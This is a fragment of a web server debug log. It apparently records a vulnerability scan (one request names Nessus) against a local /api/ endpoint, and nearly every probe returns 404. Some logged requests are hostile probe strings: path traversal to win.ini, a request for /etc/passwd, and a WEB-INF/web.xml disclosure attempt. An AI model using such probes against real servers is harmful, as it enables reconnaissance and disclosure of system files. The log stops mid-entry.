GET:/api/niet1989985813.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.535Z debug: [1667344927535, duration: 0] GET:/api/iisadmpwd/aexp4b.htr, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.541Z debug: [1667344927540, duration: 1] GET:/api/niet1894410680.jspx, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.551Z debug: [1667344927550, duration: 1] GET:/api/niet368885941.php, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.561Z debug: [1667344927560, duration: 1] GET:/api/niet1905947526.php3, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.570Z debug: [1667344927568, duration: 1] GET:/api/niet1634545483.php4, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.576Z debug: [1667344927575, duration: 0] GET:/api/niet1155089417.php5, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.583Z debug: [1667344927583, duration: 0] GET:/api/niet218166491.php6, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.598Z debug: [1667344927597, duration: 1] GET:/api/niet328408418.cfm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.603Z debug: [1667344927601, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:07.613Z debug: [1667344927612, duration: 1] GET:/api/igsponsor, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.642Z debug: [1667344927640, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:07.652Z debug: [1667344927649, duration: 2] GET:/api/query.idq?CiTemplate=../../../../../winnt/win.ini, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.660Z debug: [1667344927659, duration: 0] GET:/api/query.idq?CiTemplate=../../../../../winnt/win.ini%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.697Z debug: [1667344927695, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:07.704Z debug: [1667344927703, duration: 0] GET:/api/mail/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.753Z debug: [1667344927751, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:07.762Z debug: [1667344927761, duration: 0] GET:/api/login, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.792Z debug: [1667344927790, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:07.798Z debug: [1667344927797, duration: 1] GET:/api/builtin/index.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.834Z debug: [1667344927832, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:07.841Z debug: [1667344927840, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:07.844Z debug: [1667344927843, duration: 0] GET:/api/tsp/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.851Z debug: [1667344927850, duration: 0] GET:/api/ap/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.859Z debug: [1667344927857, duration: 2] GET:/api/ssp/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.902Z debug: [1667344927901, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:07.910Z debug: [1667344927909, duration: 0] GET:/api/login, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.948Z debug: [1667344927946, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:07.955Z debug: [1667344927954, duration: 0] GET:/api/ngp/version, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:07.982Z debug: [1667344927980, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:07.989Z debug: [1667344927988, duration: 0] GET:/api/i18n/adminconsole_en_us.json, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.005Z debug: [1667344928003, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.020Z debug: [1667344928019, duration: 0] GET:/api/cgi-bin/com5.pl, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.021Z debug: [1667344928018, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.031Z debug: [1667344928030, duration: 1] GET:/api/oc/lib-prod/tsm/TSM-login.js, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.060Z debug: [1667344928059, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.072Z debug: [1667344928071, duration: 1] GET:/api/rcladmin/js/art_i18n/nls/art_i18n.js, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.074Z debug: [1667344928070, duration: 4] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.086Z debug: [1667344928085, duration: 0] GET:/api/rdweb/login/login.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.116Z debug: [1667344928113, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.120Z debug: [1667344928118, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.124Z debug: [1667344928123, duration: 1] GET:/api/ibmmq/console/login.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.129Z debug: [1667344928128, duration: 1] GET:/api/jts/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.134Z debug: [1667344928132, duration: 1] GET:/api/ibmmq/console/nls/en/strings.json, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.161Z debug: [1667344928159, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.173Z debug: [1667344928172, duration: 0] GET:/api/dp/login.xml, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.182Z debug: [1667344928180, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.189Z debug: [1667344928188, duration: 0] GET:/api/shared/userlogin.php, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.207Z debug: [1667344928204, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.225Z debug: [1667344928223, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.229Z debug: [1667344928228, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.237Z debug: [1667344928237, duration: 0] GET:/api/trc, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.256Z debug: [1667344928254, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.265Z debug: [1667344928264, duration: 0] GET:/api/~nobody/etc/passwd, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.296Z debug: [1667344928294, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.306Z debug: [1667344928305, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.309Z debug: [1667344928307, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.316Z debug: [1667344928314, duration: 0] GET:/api/redfish/v1/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.349Z debug: [1667344928347, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.364Z debug: [1667344928361, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.364Z debug: [1667344928362, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.372Z debug: [1667344928371, duration: 1] GET:/api/js/hpsum/hpsum-version.js, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.381Z debug: [1667344928380, duration: 0] GET:/api/js/hpsum/hpsum-version.js, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.389Z debug: [1667344928388, duration: 0] GET:/api/js/hpsum/hpsum-version.js, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.396Z debug: [1667344928395, duration: 1] GET:/api/js/hpsum/hpsum-version.js, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.397Z debug: [1667344928394, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.405Z debug: [1667344928404, duration: 0] GET:/api/js/hpsum/hpsum-version.js, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.406Z debug: [1667344928405, duration: 1] GET:/api/SiteScope/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.437Z debug: [1667344928435, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.444Z debug: [1667344928443, duration: 1] GET:/api/oo/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.458Z debug: [1667344928456, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.467Z debug: [1667344928466, duration: 0] GET:/api/xmldata?item=all, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.478Z debug: [1667344928476, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.486Z debug: [1667344928485, duration: 1] GET:/api/nnm/main, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.516Z debug: [1667344928514, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.525Z debug: [1667344928522, duration: 2] GET:/api/imc, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.537Z debug: [1667344928533, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.549Z debug: [1667344928548, duration: 1] GET:/api/autopass/login_input, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.581Z debug: [1667344928579, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.590Z debug: [1667344928588, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.593Z debug: [1667344928592, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.600Z debug: [1667344928600, duration: 0] GET:/api/hazelcast/rest/cluster, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.621Z debug: [1667344928619, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.633Z debug: [1667344928632, duration: 0] GET:/api/public/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.639Z debug: [1667344928638, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.647Z debug: [1667344928647, duration: 0] GET:/api/com/novell/webaccess/WebAccessUninstall.ini, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.667Z debug: [1667344928665, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.676Z debug: [1667344928675, duration: 0] GET:/api/portal, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.678Z debug: [1667344928677, duration: 0] GET:/api/_mt/mt.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.684Z debug: [1667344928682, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.694Z debug: [1667344928693, duration: 1] GET:/api/servlet/webacc?error=webacc, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.726Z debug: [1667344928724, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.753Z debug: [1667344928752, duration: 0] GET:/api/login, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.798Z debug: [1667344928796, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.806Z debug: [1667344928805, duration: 1] GET:/api/users/sign_in, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.842Z debug: [1667344928840, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.850Z debug: [1667344928848, duration: 0] GET:/api/setup, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.895Z debug: [1667344928891, duration: 3] GET:/api/WEB-INF./web.xml, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.924Z debug: [1667344928922, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.931Z debug: [1667344928930, duration: 0] GET:/api/ews/index.htm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:08.976Z debug: [1667344928973, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:08.984Z debug: [1667344928983, duration: 1] GET:/api/_vti_bin/shtml.dll/_vti_rpc, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:09.023Z debug: [1667344929021, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:09.034Z debug: [1667344929032, duration: 0] GET:/api/_vti_bin/fpcount.exe, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:09.073Z debug: [1667344929067, duration: 4] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:09.088Z debug: [1667344929087, duration: 0] GET:/api/system/console?version=1.5, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:09.098Z debug: [1667344929097, duration: 0] GET:/api/images/login_top.gif, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:09.105Z debug: [1667344929104, duration: 1] GET:/api/images/logon_merge.gif, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:09.112Z debug: [1667344929111, duration: 0] GET:/api/login, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:09.165Z debug: [1667344929162, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:09.173Z debug: [1667344929172, duration: 0] GET:/api/f360/login.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:09.184Z debug: [1667344929183, duration: 0] GET:/api/login.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:09.224Z debug: [1667344929222, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:09.231Z debug: [1667344929230, duration: 1] GET:/api/login/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:09.262Z debug: [1667344929260, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:09.269Z debug: [1667344929268, duration: 0] GET:/api/features, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:09.302Z debug: [1667344929300, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:09.310Z debug: [1667344929309, duration: 0] GET:/api/default.php, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:09.318Z debug: [1667344929317, duration: 0] GET:/api/fogbugz/default.php, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:09.351Z debug: [1667344929350, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:09.359Z debug: [1667344929357, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:09.396Z debug: [1667344929393, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:09.405Z debug: [1667344929404, duration: 0] GET:/api/login/login, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:09.449Z debug: [1667344929447, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:09.456Z debug: [1667344929456, duration: 0] GET:/api/acopia/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:09.489Z debug: [1667344929486, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:09.497Z debug: [1667344929496, duration: 1] GET:/api/ui/login/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:09.530Z debug: [1667344929528, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:09.538Z debug: [1667344929537, duration: 0] GET:/api/eonapi/getAuthenticationStatus, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:09.574Z debug: [1667344929572, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:09.581Z debug: [1667344929581, duration: 0] GET:/api/login.web, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:09.617Z debug: [1667344929616, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:09.625Z debug: [1667344929623, duration: 1] GET:/api/?, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:09.657Z debug: [1667344929655, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:09.664Z debug: [1667344929663, duration: 1] POST:/api/spipe?Source=nessus, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:09.696Z debug: [1667344929694, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:09.704Z debug: [1667344929703, duration: 0] GET:/api/PUBLIC/ADMIN/INDEX.HTM, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:09.741Z debug: [1667344929739, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:09.748Z debug: [1667344929747, duration: 1] GET:/api/SE/appInfo.xml, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:09.756Z debug: [1667344929755, duration: 0] GET:/api/SE/EMC_SE.swf, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:09.765Z debug: [1667344929764, duration: 1] GET:/api/SE/EMC_SE.swf, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:09.827Z debug: [1667344929825, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:09.837Z debug: [1667344929836, duration: 0] GET:/api/RSAarcher/Default.aspx, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:09.844Z debug: [1667344929844, duration: 0] GET:/api/RSAarcher/Default.asp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:09.910Z debug: [1667344929908, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:09.918Z debug: [1667344929917, duration: 1] GET:/api/dtlt/home.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:09.962Z debug: [1667344929960, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:09.969Z debug: [1667344929968, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:09.972Z debug: [1667344929971, duration: 1] GET:/api/update.php?op=info, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:09.980Z debug: [1667344929979, duration: 0] GET:/api/misc/drupal.js, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:09.987Z debug: [1667344929986, duration: 1] GET:/api/core/misc/drupal.js, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:09.993Z debug: [1667344929993, duration: 0] GET:/api/drupal/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:10.002Z debug: [1667344930000, duration: 0] GET:/api/drupal/update.php?op=info, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:10.009Z debug: [1667344930008, duration: 0] GET:/api/drupal/misc/drupal.js, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:10.015Z debug: [1667344930014, duration: 1] GET:/api/drupal/core/misc/drupal.js, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:10.059Z debug: [1667344930057, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:10.066Z debug: [1667344930065, duration: 0] GET:/api/web/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:10.098Z debug: [1667344930095, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:10.104Z debug: [1667344930104, duration: 0] POST:/api/cgi-bin/mainfunction.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:10.136Z debug: [1667344930133, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:10.143Z debug: [1667344930142, duration: 1] GET:/api/tHG49GqY.ashx, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:10.151Z debug: [1667344930150, duration: 0] GET:/api/yMZd1oJv.aspx, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:10.158Z debug: [1667344930157, duration: 1] GET:/api/C4QJAeQE.asmx, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:10.166Z debug: [1667344930165, duration: 0] GET:/api/MufanDSg.rem, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:10.174Z debug: [1667344930173, duration: 0] GET:/api/UaPS3uzI.soap, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:10.210Z debug: [1667344930209, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:10.219Z debug: [1667344930215, duration: 4] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:10.223Z debug: [1667344930222, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:10.261Z debug: [1667344930260, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:10.267Z debug: [1667344930266, duration: 1] GET:/api/Nvfv3Thd.aspx, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:10.297Z debug: [1667344930295, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:10.303Z debug: [1667344930302, duration: 1] GET:/api/qxqKwXjo.ashx, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:10.309Z debug: [1667344930309, duration: 0] GET:/api/0HUlxwTI.aspx, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:10.317Z debug: [1667344930315, duration: 1] GET:/api/ZgAsUGIh.asmx, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:10.363Z debug: [1667344930361, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:10.370Z debug: [1667344930369, duration: 1] GET:/api/syslog.htm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:10.401Z debug: [1667344930399, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:10.408Z debug: [1667344930407, duration: 1] GET:/api/devinfo.xml, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:10.439Z debug: [1667344930437, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:10.446Z debug: [1667344930445, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:10.450Z debug: [1667344930449, duration: 0] GET:/api/api, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:10.533Z debug: [1667344930531, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:10.543Z debug: [1667344930541, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:10.596Z debug: [1667344930594, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:10.604Z debug: [1667344930603, duration: 1] GET:/api/servlet/UDataArea?plugin=com.dell.oma.webplugins.AboutWebPlugin, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:10.613Z debug: [1667344930612, duration: 1] GET:/api/UDataArea?plugin=com.dell.oma.webplugins.AboutWebPlugin, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:10.652Z debug: [1667344930650, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:10.661Z debug: [1667344930660, duration: 0] GET:/api/about, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:10.702Z debug: [1667344930700, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:10.709Z debug: [1667344930708, duration: 1] GET:/api/common/about.php, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:10.748Z debug: [1667344930746, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:10.758Z debug: [1667344930757, duration: 1] GET:/api/test.js, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:10.781Z debug: [1667344930779, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:10.791Z debug: [1667344930790, duration: 1] GET:/api/PasswordVault/logon.aspx, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:10.801Z debug: [1667344930798, duration: 2] GET:/api/PasswordVault/auth/cyberark, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:10.856Z debug: [1667344930855, duration: 0] GET:/api/CVS/Entries, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:10.887Z debug: [1667344930885, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:10.895Z debug: [1667344930893, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:10.898Z debug: [1667344930897, duration: 1] GET:/api/rest-service/reviews-v1/versionInfo, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:10.933Z debug: [1667344930931, duration: 1] GET:/api/index.html?urlmaskfilter=, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:10.992Z debug: [1667344930990, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:10.999Z debug: [1667344930998, duration: 1] GET:/api/servlet/webacc?User.lang=, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.037Z debug: [1667344931035, duration: 1] GET:/api/popuplargeimage.asp?strImageTag=, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.057Z debug: [1667344931055, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:11.066Z debug: [1667344931065, duration: 1] GET:/api/crossdomain.xml, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.111Z debug: [1667344931109, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:22:11.119Z debug: [1667344931118, duration: 0] GET:/api/juyzqplr.asp?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.122Z debug: [1667344931121, duration: 1] GET:/api/juyzqplr.asp?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.125Z debug: [1667344931124, duration: 1] GET:/api/juyzqplr.aspx?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.128Z debug: [1667344931127, duration: 1] GET:/api/juyzqplr.aspx?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.130Z debug: [1667344931130, duration: 0] GET:/api/juyzqplr.pl?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.135Z debug: [1667344931133, duration: 1] GET:/api/juyzqplr.pl?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.137Z debug: [1667344931137, duration: 0] GET:/api/juyzqplr.cgi?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.139Z debug: [1667344931139, duration: 0] GET:/api/juyzqplr.cgi?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.146Z debug: [1667344931145, duration: 1] GET:/api/juyzqplr.exe?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.149Z debug: [1667344931148, duration: 1] GET:/api/juyzqplr.exe?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.152Z debug: [1667344931152, duration: 0] GET:/api/juyzqplr.cfm?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.157Z debug: [1667344931156, duration: 0] GET:/api/juyzqplr.cfm?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.160Z debug: [1667344931159, duration: 1] GET:/api/juyzqplr.html?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.164Z debug: [1667344931163, duration: 0] GET:/api/juyzqplr.html?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.167Z debug: [1667344931166, duration: 1] GET:/api/juyzqplr.jsp?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.169Z debug: [1667344931169, duration: 0] GET:/api/juyzqplr.jsp?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.172Z debug: [1667344931171, duration: 0] GET:/api/juyzqplr.php?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.174Z debug: [1667344931173, duration: 1] GET:/api/juyzqplr.php?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.186Z debug: [1667344931186, duration: 0] GET:/api/juyzqplr.php3?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.189Z debug: [1667344931189, duration: 0] GET:/api/juyzqplr.php3?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.193Z debug: [1667344931192, duration: 0] GET:/api/juyzqplr.cfc?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.195Z debug: [1667344931194, duration: 0] GET:/api/juyzqplr.cfc?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.197Z debug: [1667344931197, duration: 0] GET:/api/juyzqplr.nsf?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.199Z debug: [1667344931199, duration: 0] GET:/api/juyzqplr.nsf?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.203Z debug: [1667344931201, duration: 1] GET:/api/juyzqplr.dll?, reqOrigin: ::1, resCode: 404 +2022-11-01T23:22:11.204Z debug: [1667344931204, duration: 0] GET:/api/juyzqplr.dll?, reqOrigin: ::1, 